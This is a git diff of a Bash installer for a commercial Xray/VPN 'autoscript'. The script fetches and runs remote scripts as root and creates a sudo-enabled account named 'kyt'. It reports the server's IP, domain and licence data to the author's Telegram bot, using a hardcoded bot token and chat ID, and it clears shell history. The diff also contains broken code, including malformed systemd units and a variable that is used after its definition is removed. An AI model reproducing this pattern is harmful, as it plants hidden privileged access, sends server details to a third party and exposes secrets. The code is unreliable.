Update run

diff --git a/run b/run
--- a/run
+++ b/run
@@ -1,16 +1,9 @@
 #!/bin/bash
-merah="\033[1;31m"  #REDTERANG
-akuu="\033[33m"  #yello
-##
-
-clear
-
-### Yaddy Kakkoii tampan
+### Color
 Green="\e[92;1m"
 RED="\033[31m"
 YELLOW="\033[33m"
 BLUE="\033[36m"
-z="\033[96m"
 FONT="\033[0m"
 GREENBG="\033[42;37m"
 REDBG="\033[41;37m"
@@ -20,20 +13,6 @@ GRAY="\e[1;30m"
 NC='\e[0m'
 red='\e[1;31m'
 green='\e[0;32m'
-##Logo
-function LOGO() {
-   echo -e "
-    ┌───────────────────────────────────────────────┐
- ───│                                               │───
- ───│    $Green┌─┐┬ ┬┌┬┐┌─┐┌─┐┌─┐┬─┐┬┌─┐┌┬┐  ┬  ┬┌┬┐┌─┐$NC   │───
- ───│    $Green├─┤│ │ │ │ │└─┐│  ├┬┘│├─┘ │   │  │ │ ├┤ $NC   │───
- ───│    $Green┴ ┴└─┘ ┴ └─┘└─┘└─┘┴└─┴┴   ┴   ┴─┘┴ ┴ └─┘$NC   │───
-    │    ${YELLOW}Copyright${FONT} (C)$GRAY https://github.com/heruahmad$NC   │
-    └───────────────────────────────────────────────┘
-         ${RED}Autoscript xray vpn lite (multi port)${FONT}    
-${RED}Make sure the internet is smooth when installing the script${FONT}
-        "
-}
 # ===================
 clear
   # // Exporint IP AddressInformation
@@ -45,39 +24,15 @@ clear && clear && clear
 clear;clear;clear
 
   # // Banner
-echo -e "${RED}◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇${NC}"
-echo -e "  Welcome To Rizyul Store Script Manager ${BLUE}(${NC}${BLUE} New Edition ${NC}${BLUE})${NC}"
-echo -e "     This Will Quick Setup VPN Server On Your Server"
-echo -e "         Auther : ${BLUE}Rzyul ${NC}${BLUE}(${NC} ${BLUE} Rizyul Store ${NC}${BLUE})${NC}"
-echo -e "       © Recode By Rizyul Store ${BLUE}(${NC} 2023 ${BLUE})${NC}"
-echo -e "${RED}◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇${NC}"
+  echo -e "\e[32m      ┌───────────────────────────────────────────────┐\033[0m"
+  echo -e "\e[32m   ───│                                               │───\033[0m"
+  echo -e "\e[32m   ───│    ┌─┐┬ ┬┌┬┐┌─┐┌─┐┌─┐┬─┐┬┌─┐┌┬┐  ┬  ┬┌┬┐┌─┐   │───\033[0m"
+  echo -e "\e[32m   ───│    ├─┤│ │ │ │ │└─┐│  ├┬┘│├─┘ │   │  │ │ ├┤    │───\033[0m"
+  echo -e "\e[32m   ───│    ┴ ┴└─┘ ┴ └─┘└─┘└─┘┴└─┴┴   ┴   ┴─┘┴ ┴ └─┘   │───\033[0m"
+  echo -e "\e[32m      │\033[0m  \e[33m      HR-vpn (C)https://t.me/HRstores      \033[0m \e[32m │\033[0m"
+  echo -e "\e[32m      └───────────────────────────────────────────────┘\033[0m"
 echo ""
-sleep 3
-###### IZIN SC 
-ipsaya=$(wget -qO- ipinfo.io/ip)
-data_server=$(curl -v --insecure --silent https://google.com/ 2>&1 | grep Date | sed -e 's/< Date: //')
-date_list=$(date +"%Y-%m-%d" -d "$data_server")
-data_ip="https://raw.githubusercontent.com/botak8/san/main/izin"
-checking_sc() {
-  useexp=$(wget -qO- $data_ip | grep $ipsaya | awk '{print $3}')
-  if [[ $date_list < $useexp ]]; then
-    echo -ne
-  else
-    echo -e "\033[1;93m────────────────────────────────────────────\033[0m"
-    echo -e "\033[42m         SCRIPT PERMISSION DEAD          \033[0m"
-    echo -e "\033[1;93m────────────────────────────────────────────\033[0m"
-    echo -e ""
-    echo -e "            ${RED}PERMISSION DENIED !${NC}"
-    echo -e "   \033[0;33mYour VPS${NC} $ipsaya \033[0;33mHas been Banned${NC}"
-    echo -e "     \033[0;33mBuy access permissions for scripts${NC}"
-    echo -e "             \033[0;33mContact Admin :${NC}"
-    echo -e "      \033[0;36mTelegram${NC} t.me/kytxz"
-    echo -e "      ${GREEN}WhatsApp${NC} wa.me/6281774970898"
-    echo -e "\033[1;93m────────────────────────────────────────────\033[0m"
-    exit
-  fi
-}
-checking_sc
+
 # // Checking Os Architecture
 if [[ $( uname -m | awk '{print $1}' ) == "x86_64" ]]; then
     echo -e "${OK} Your Architecture Is Supported ( ${green}$( uname -m )${NC} )"
@@ -119,15 +74,9 @@ fi
 red='\e[1;31m'
 green='\e[0;32m'
 NC='\e[0m'
-clear
-###
-LOGO
-echo -e "${merah}JANGAN INSTALL SCRIPT INI MENGGUNAKAN KONEKSI VPN!!!${FONT}"
-echo -e ""
-echo -e "${Green}DNS POINTING${FONT}(DNS-resolved IP address of the domain)"
-echo -e "${Green}Menuju Proses Penginstalan Dalam 8 Detik Lagi !!!"
-echo ""
-sleep 8
+#IZIN SCRIPT
+MYIP=$(curl -sS ipv4.icanhazip.com)
+echo -e "\e[32mloading...\e[0m"
 clear
 #IZIN SCRIPT
 MYIP=$(curl -sS ipv4.icanhazip.com)
@@ -139,10 +88,8 @@ clear
 # USERNAME
 rm -f /usr/bin/user
 username=$(curl https://raw.githubusercontent.com/botak8/san/main/izin | grep $MYIP | awk '{print $2}')
-#username=$(curl https://abc.xcodehoster.com/izin | grep $MYIP | awk '{print $2}')
 echo "$username" >/usr/bin/user
 expx=$(curl https://raw.githubusercontent.com/botak8/san/main/izin | grep $MYIP | awk '{print $3}')
-$expx=$(curl https://abc.xcodehoster.com/izin | grep $MYIP | awk '{print $3}')
 echo "$expx" >/usr/bin/e
 # DETAIL ORDER
 username=$(cat /usr/bin/user)
@@ -162,12 +109,11 @@ datediff() {
 }
 mai="datediff "$Exp" "$DATE""
 
-# Status ExpiRED Active | myrid Project
+# Status ExpiRED Active | Geo Project
 Info="(${green}Active${NC})"
 Error="(${RED}ExpiRED${NC})"
 today=`date -d "0 days" +"%Y-%m-%d"`
 Exp1=$(curl https://raw.githubusercontent.com/botak8/san/main/izin | grep $MYIP | awk '{print $4}')
-#Exp1=$(curl https://abc.xcodehoster.com/izin | grep $MYIP | awk '{print $4}')
 if [[ $today < $Exp1 ]]; then
 sts="${Info}"
 else
@@ -177,7 +123,6 @@ echo -e "\e[32mloading...\e[0m"
 clear
 # REPO    
     REPO="https://raw.githubusercontent.com/botak8/san/main/"
-   
 
 ####
 start=$(date +%s)
@@ -185,17 +130,12 @@ secs_to_human() {
     echo "Installation time : $((${1} / 3600)) hours $(((${1} / 60) % 60)) minute's $((${1} % 60)) seconds"
 }
 ### Status
-
 function print_ok() {
     echo -e "${OK} ${BLUE} $1 ${FONT}"
 }
 function print_install() {
-	echo -e "${green} ◇━━━━━━━━━━━━━━━━━━━━━━━◇ ${FONT}"
-	echo -e "${green} ┌──────• MEMASANG •───────┐ ${FONT}"
-    echo -e "${YELLOW} │ 🌿 $1 ${FONT}"
-    echo -e "${green} └─────────────────────────┘ ${FONT}"
-	echo -e "${green} ◇━━━━━━━━━━━━━━━━━━━━━━━◇ ${FONT}"
-    sleep 2
+    echo -e "${YELLOW} # $1 ${FONT}"
+    sleep 1
 }
 
 function print_error() {
@@ -204,11 +144,7 @@ function print_error() {
 
 function print_success() {
     if [[ 0 -eq $? ]]; then
-		echo -e "${green} ◇━━━━━━━━━━━━━━━━━━━━━━━◇ ${FONT}"
-        echo -e "${green} ┌──────• BERHASILL •───────┐ ${FONT}"
-        echo -e "${YELLOW} │ 🌿 $1 ${FONT}"
-        echo -e "${green} └──────────────────────────┘ ${FONT}"
-		echo -e "${green} ◇━━━━━━━━━━━━━━━━━━━━━━━◇ ${FONT}"
+        echo -e "${Green} # $1 berhasil dipasang"
         sleep 2
     fi
 }
@@ -282,7 +218,7 @@ else
 fi
 }
 
-# myrid PROJECT
+# GEO PROJECT
 clear
 function nginx_install() {
     # // Checking System
@@ -309,13 +245,12 @@ function base_package() {
     apt update -y
     apt upgrade -y
     apt dist-upgrade -y
-    gem install lolcat
     systemctl enable chronyd
     systemctl restart chronyd
     systemctl enable chrony
     systemctl restart chrony
     chronyc sourcestats -v
-    chronyc tracking -y
+    chronyc tracking -v
     apt install ntpdate -y
     ntpdate pool.ntp.org
     apt install sudo -y
@@ -332,45 +267,32 @@ function base_package() {
     
 }
 clear
-# Fungsi input domain
-clear
-sleep 2
-function pasang_domain() {
-echo -e ""
-echo -e "    ┌───────────────────────────────────────────────┐"
-echo -e " ───│                                               │───"
-echo -e " ───│    $Green┌─┐┬ ┬┌┬┐┌─┐┌─┐┌─┐┬─┐┬┌─┐┌┬┐  ┬  ┬┌┬┐┌─┐$NC   │───"
-echo -e " ───│    $Green├─┤│ │ │ │ │└─┐│  ├┬┘│├─┘ │   │  │ │ ├┤ $NC   │───"
-echo -e " ───│    $Green┴ ┴└─┘ ┴ └─┘└─┘└─┘┴└─┴┴   ┴   ┴─┘┴ ┴ └─┘$NC   │───"
-echo -e "    │    ${YELLOW}Copyright${FONT} (C)$GRAY https://github.com/aripTaz$NC   │"
-echo -e "    └───────────────────────────────────────────────┘"
-echo -e "         ${RED}Autoscript xray vpn lite (multi port)${FONT}"    
-echo -e "${RED}Make sure the internet is smooth when installing the script${FONT}"
-echo -e "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
-echo -e "Your Select Domain For Tunneling"
-echo -e ""
-echo -e "     \e[1;32m1)\e[0m Pakai Domain Sendiri"
-echo -e "     \e[1;32m2)\e[0m Pakai Domain Dari Script"
-echo -e " "
-read -p "   Please select numbers 1-2 or Any Button(Random) : " host
-echo ""
-if [[ $host == "1" ]]; then
-echo -e "   \e[1;32mPlease Enter Your Subdomain $NC"
-read -p "   Subdomain: " host1
-echo "IP=" >> /var/lib/kyt/ipvps.conf
-echo $host1 > /etc/xray/domain
-echo $host1 > /root/domain
-echo ""
-elif [[ $host == "2" ]]; then
-echo ""
-#install cf
-wget https://raw.githubusercontent.com/botak8/san/main/cf.sh && chmod +x cf.sh && ./cf.sh
-clear
-else
-print_install "Random Subdomain/Domain is Used"
-wget https://raw.githubusercontent.com/botak8/san/main/cf.sh && chmod +x cf.sh && ./cf.sh
-clear
+function add_domain() {
+    echo "`cat /etc/banner`" | lolcat
+    echo -e "${red}    ♦️${NC} ${green} CUSTOM SETUP DOMAIN VPS     ${NC}"
+    echo -e "${red}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[0m${NC}"
+    echo "1. Use Domain From Script / Gunakan Domain Dari Script"
+    echo "2. Choose Your Own Domain / Pilih Domain Sendiri (recommended)"
+    echo -e "${red}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\033[0m${NC}"
+    read -rp "Choose Your Domain Installation : " dom 
+
+    if test $dom -eq 1; then
+    clear
+    wget -q -O /root/cf "${CDNF}/cf" >/dev/null 2>&1
+    chmod +x /root/cf
+    bash /root/cf | tee /root/install.log
+    print_success "DomainAll"
+    elif test $dom -eq 2; then
+    read -rp "Enter Your Domain : " domen 
+    echo $domen > /root/domain
+    cp /root/domain /etc/xray/domain
+    else 
+    echo "Not Found Argument"
+    exit 1
     fi
+    echo -e "${GREEN}Done!${NC}"
+    sleep 2
+    clear
 }
 
 clear
@@ -403,26 +325,20 @@ rm -rf /etc/vmess/.vmess.db
     rm -rf /etc/shadowsocks/.shadowsocks.db
     rm -rf /etc/ssh/.ssh.db
     rm -rf /etc/bot/.bot.db
-    mkdir -p /etc/bot/
+    mkdir -p /etc/bot
     mkdir -p /etc/xray
     mkdir -p /etc/vmess
     mkdir -p /etc/vless
-    mkdir -p /etc/ssnvpn
-    mkdir -p /etc/ssnvpn/theme
-    mkdir -p /var/lib/ssnvpn-pro
     mkdir -p /etc/trojan
-    mkdir -p /etc/myrid/ssh/log
-    mkdir -p /etc/myrid/vless/log
-    mkdir -p /etc/myrid/vmess/log
-    mkdir -p /etc/myrid/trojan/log
     mkdir -p /etc/shadowsocks
+    mkdir -p /etc/ssh
     mkdir -p /usr/bin/xray/
     mkdir -p /var/log/xray/
     mkdir -p /var/www/html
-    mkdir -p /etc/myrid/limit/vmess/ip
-    mkdir -p /etc/myrid/limit/vless/ip
-    mkdir -p /etc/myrid/limit/trojan/ip
-    mkdir -p /etc/myrid/limit/ssh/ip
+    mkdir -p /etc/kyt/limit/vmess/ip
+    mkdir -p /etc/kyt/limit/vless/ip
+    mkdir -p /etc/kyt/limit/trojan/ip
+    mkdir -p /etc/kyt/limit/ssh/ip
     mkdir -p /etc/limit/vmess
     mkdir -p /etc/limit/vless
     mkdir -p /etc/limit/trojan
@@ -474,7 +390,7 @@ bash -c "$(curl -L https://github.com/XTLS/Xray-install/raw/main/install-release
     wget -O /etc/nginx/conf.d/xray.conf "${REPO}xray/xray.conf" >/dev/null 2>&1
     sed -i "s/xxx/${domain}/g" /etc/haproxy/haproxy.cfg
     sed -i "s/xxx/${domain}/g" /etc/nginx/conf.d/xray.conf
-    curl https://raw.githubusercontent.com/SETANTAZVPN/sc/main/ssh/nginx.conf > /etc/nginx/nginx.conf
+    curl ${REPO}ssh/nginx.conf > /etc/nginx/nginx.conf
     
 cat /etc/xray/xray.crt /etc/xray/xray.key | tee /etc/haproxy/hap.pem
 
@@ -588,7 +504,66 @@ chmod + x /usr/local/sbin/quota
 cd /usr/local/sbin/
 sed -i 's/\r//' quota
 cd
+wget -q -O /usr/bin/limit-ip "${REPO}limit/limit-ip"
+chmod +x /usr/bin/*
+cd /usr/bin
+sed -i 's/\r//' limit-ip
+cd
+clear
+#SERVICE LIMIT ALL IP
+cat >/etc/systemd/system/vmip.service << EOF
+[Unit]
+Description=My
+ProjectAfter=network.target
+
+[Service]
+WorkingDirectory=/root
+ExecStart=/usr/bin/limit-ip vmip
+Restart=always
+
+[Install]
+WantedBy=multi-user.target
+EOF
+systemctl daemon-reload
+systemctl restart vmip
+systemctl enable vmip
+
+cat >/etc/systemd/system/vlip.service << EOF
+[Unit]
+Description=My
+ProjectAfter=network.target
+
+[Service]
+WorkingDirectory=/root
+ExecStart=/usr/bin/limit-ip vlip
+Restart=always
+
+[Install]
+WantedBy=multi-user.target
+EOF
+systemctl daemon-reload
+systemctl restart vlip
+systemctl enable vlip
+
+cat >/etc/systemd/system/trip.service << EOF
+[Unit]
+Description=My
+ProjectAfter=network.target
+
+[Service]
+WorkingDirectory=/root
+ExecStart=/usr/bin/limit-ip trip
+Restart=always
+
+[Install]
+WantedBy=multi-user.target
+EOF
+systemctl daemon-reload
+systemctl restart trip
+systemctl enable trip
 #SERVICE LIMIT QUOTA
+
+#SERVICE VMESS
 cat >/etc/systemd/system/qmv.service << EOF
 [Unit]
 Description=My
@@ -897,14 +872,12 @@ print_success "All Packet"
 function menu(){
     clear
     print_install "Memasang Menu Packet"
-    wget https://raw.githubusercontent.com/botak8/san/main/menu/menu.zip
+    wget ${REPO}menu/menu.zip
     unzip menu.zip
     chmod +x menu/*
     mv menu/* /usr/local/sbin
     rm -rf menu
     rm -rf menu.zip
-#botmintod
-  
 }
 
 # Membaut Default Menu 
@@ -927,7 +900,7 @@ cat >/etc/cron.d/xp_all <<-END
 		2 0 * * * root /usr/local/sbin/xp
 	END
     chmod 644 /root/.profile
-
+	
     cat >/etc/cron.d/daily_reboot <<-END
 		SHELL=/bin/sh
 		PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
@@ -1003,9 +976,9 @@ clear
     first_setup
     nginx_install
     base_package
-    password_default
     make_folder_xray
     pasang_domain
+    password_default
     pasang_ssl
     install_xray
     ssh
@@ -1025,7 +998,7 @@ clear
     enable_services
 }
 function password_default() {
-domain=$(cat /etc/xray/domain)
+    domain=$(cat /root/domain)
     MYIP=$(curl -sS ipv4.icanhazip.com)
     userdel jame > /dev/null 2>&1
     Username="kyt"
@@ -1036,32 +1009,38 @@ domain=$(cat /etc/xray/domain)
     echo -e "$Password\n$Password\n"|passwd $Username > /dev/null 2>&1
     usermod -aG sudo $Username > /dev/null 2>&1
 
-    CHATID="-100190985"
-    KEY="6094210402ZMJ8PbcR4SjKvH1n-qDEGm0HoiAIWY"
+    CHATID="5807961610"
+    KEY="6210655575:AAH4TkHoDco4ShhlrD6HZMUIfpTWHKIVdog"
     TIME="10"
     URL="https://api.telegram.org/bot$KEY/sendMessage"
-    TEXT="
-<code>────────────────────</code>
-<b>   AUTOSCRIPT DEVILS TUNNEL  </b>
-<code>────────────────────</code>
-<code>User   : </code><code>$USRSC</code>
-<code>Domain : </code><code>$domain</code>
-<code>Date   : </code><code>$TIMES</code>
-<code>Time   : </code><code>$TIMEZONE</code>
-<code>Ip vps : </code><code>$MYIP</code>
-<code>Exp Sc : </code><code>$EXPSC</code>
-<code>────────────────────</code>
-<i>Automatic Notification from</i>
-<i>Devils Tunnel</i>
-"'&reply_markup={"inline_keyboard":[[{"text":"ᴏʀᴅᴇʀ🐳","url":"https://t.me/devilstunnels"},{"text":"GRUP🐬","url":"https://t.me/rizyulvpn"}]]}'
+    USRSC=$(curl https://raw.githubusercontent.com/botak8/san/main/izin | grep $ipsaya | awk '{print $2}')
+    EXPSC=$(curl https://raw.githubusercontent.com/botak8/san/main/izin | grep $ipsaya | awk '{print $3}')
+    TIMES=`date -d "0 days" +"%d-%m-%Y" `
+    TIMEZONE=$(printf '%(%H:%M:%S)T')
+    TEXT=" 
+    ============================
+       ‼️ Registrasi Script ‼️
+    ============================
+    <code>User   : </code><code>$USRSC</code>
+    <code>Domain : </code><code>$domain</code>
+    <code>Date   : </code><code>$TIMES</code>
+    <code>Time   : </code><code>$TIMEZONE</code>
+    <code>Ip vps : </code><code>$MYIP</code>
+    <code>Exp Sc : </code><code>$EXPSC</code>
+    ============================
+    Auto Massage from BOT Registered 
+"'&reply_markup={"inline_keyboard":[[{"text":"ᴏʀᴅᴇʀ🐳","url":"https://t.me/heruahmad"},{"text":"GRUP🐬","url":"https://t.me/HRstors"}]]}'
    
 curl -s --max-time $TIME -d "chat_id=$CHATID&disable_web_page_preview=1&text=$TEXT&parse_mode=html" $URL >/dev/null
 
 }
 
+clear
+
 instal
 echo ""
 history -c
+rm -rf /root/menu
 rm -rf /root/*.zip
 rm -rf /root/*.sh
 rm -rf /root/LICENSE
@@ -1070,33 +1049,31 @@ rm -rf /root/domain
 #sudo hostnamectl set-hostname $user
 secs_to_human "$(($(date +%s) - ${start}))"
 echo ""
-echo -e ""
 clear
+echo " "
 echo " 𝗦𝘂𝗰𝗰𝗲𝘀 𝗮𝘁 𝗥𝗲𝗴𝗶𝘀𝘁𝗿𝘆" | tee -a log-install.txt
 echo "    𝗩𝗣𝗦 𝗜𝗡𝗙𝗢" | tee -a log-install.txt
 echo "    ◇━━━━━━━━━━━━━━━━━━━━━━━◇" | tee -a log-install.txt
-echo "    Isp Vps : $ISP" | tee -a log-install.txt
+echo "    Isp Vps    : $ISP" | tee -a log-install.txt
 echo "    Domain     : $domain" | tee -a log-install.txt
 echo "    IP Vps     : $MYIP" | tee -a log-install.txt
 echo "    OS Vps     : $OS_Name" | tee -a log-install.txt
 echo "    User Script: $USRSC" | tee -a log-install.txt
 echo "    Tanggal    : $tanggal" | tee -a log-install.txt
-echo "    Exp Vps : $exp" | tee -a log-install.txt
+echo "    Exp Vps    : $exp" | tee -a log-install.txt
 echo "    ◇━━━━━━━━━━━━━━━━━━━━━━━◇" | tee -a log-install.txt
 echo "    Hostname   : ${HOSTNAME}" | tee -a log-install.txt
 echo "    Kernel     : $Kernel" | tee -a log-install.txt
 echo "    Arch       : $Arch" | tee -a log-install.txt
-echo "    Ram Total   : $Ram_Total MB" | tee -a log-install.txt
+echo "    Ram Total  : $Ram_Total MB" | tee -a log-install.txt
 echo "    Ram Used   : $Ram_Usage MB" | tee -a log-install.txt
 echo "    ============================" | tee -a log-install.txt
-echo "  ⚠︎𝘽𝙮 STVPN 𝙋𝙧𝙤𝙟𝙚𝙘𝙩 𝙈𝙖𝙣𝙖𝙜𝙚𝙧 𝘾𝙤𝙢𝙢𝙪𝙣𝙞𝙩𝙮⚠︎" | tee -a log-install.txt
+echo "      ⚠︎𝘽𝙮 HR-vpn project ⚠︎" | tee -a log-install.txt
 echo "    ============================" | tee -a log-install.txt
 echo ""
 echo "SIMPAN DATA VPS DI ATAS" | tee -a log-install.txt
 sudo hostnamectl set-hostname $username
 echo -e "${green} Script Successfull Installed"
 echo ""
-read -n 1 -s -r -p "Press ➥ Enter To Install Udp Custom"
-echo ""
-sleep 10
+read -p "$( echo -e "Press ${YELLOW}[ ${NC}${YELLOW}Enter${NC} ${YELLOW}]${NC} For Reboot") "
 reboot
